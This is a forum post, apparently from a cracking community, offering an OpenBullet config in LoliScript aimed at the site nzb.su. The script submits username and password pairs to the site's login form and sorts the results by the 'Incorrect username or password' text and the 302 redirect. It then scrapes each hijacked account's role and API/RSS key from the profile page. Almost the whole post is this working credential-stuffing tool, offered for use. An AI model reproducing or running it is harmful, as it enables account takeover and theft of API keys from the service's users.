Sign in to follow this  
sYdr1b

nzb.su + CAP OpenBullet + LOLiSCRiPT

Recommended Posts

[hide]

 #POST REQUEST POST "https://www.nzb.su/login" AutoRedirect=FALSE 

  CONTENT "redirect=&username=&password=&rememberme=off" 

  CONTENTTYPE "application/x-www-form-urlencoded" 

  HEADER "Accept: */*" 

  HEADER "User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36" 

  HEADER "Pragma: no-cache" 

  HEADER "Accept-Encoding: gzip, deflate, br" 

  HEADER "Accept-Language: en-US,en;q=0.9" 

  HEADER "Cache-Control: max-age=0" 

  HEADER "Connection: keep-alive" 

  HEADER "Host: www.nzb.su" 

#KEYS KEYCHECK BanOn4XX=FALSE BanOnToCheck=FALSE 

  KEYCHAIN Failure OR 

    KEY "Incorrect username or password." 

  KEYCHAIN Success OR 

    KEY "" Contains "302" 

#GET REQUEST GET "https://www.nzb.su/profile" AutoRedirect=TRUE 

  CONTENT "" 

  CONTENTTYPE "application/x-www-form-urlencoded" 

  HEADER "Accept: */*" 

  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 

  HEADER "Pragma: no-cache" 

  HEADER "Accept-Encoding: gzip, deflate, br" 

  HEADER "Accept-Language: en-US,en;q=0.9" 

  HEADER "Connection: keep-alive" 

  HEADER "Host: www.nzb.su" 

#ROLE PARSE "

" CSS "#content > table > tbody > tr:nth-child(5) > td" "innerHTML" 0 -> CAP "ROLE" "" "" 

#API/RSS PARSE "

" CSS "#content > table > tbody > tr:nth-child(7) > td > a" "innerHTML" 0 -> CAP "API/RSS" "" "" 

[/hide]

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this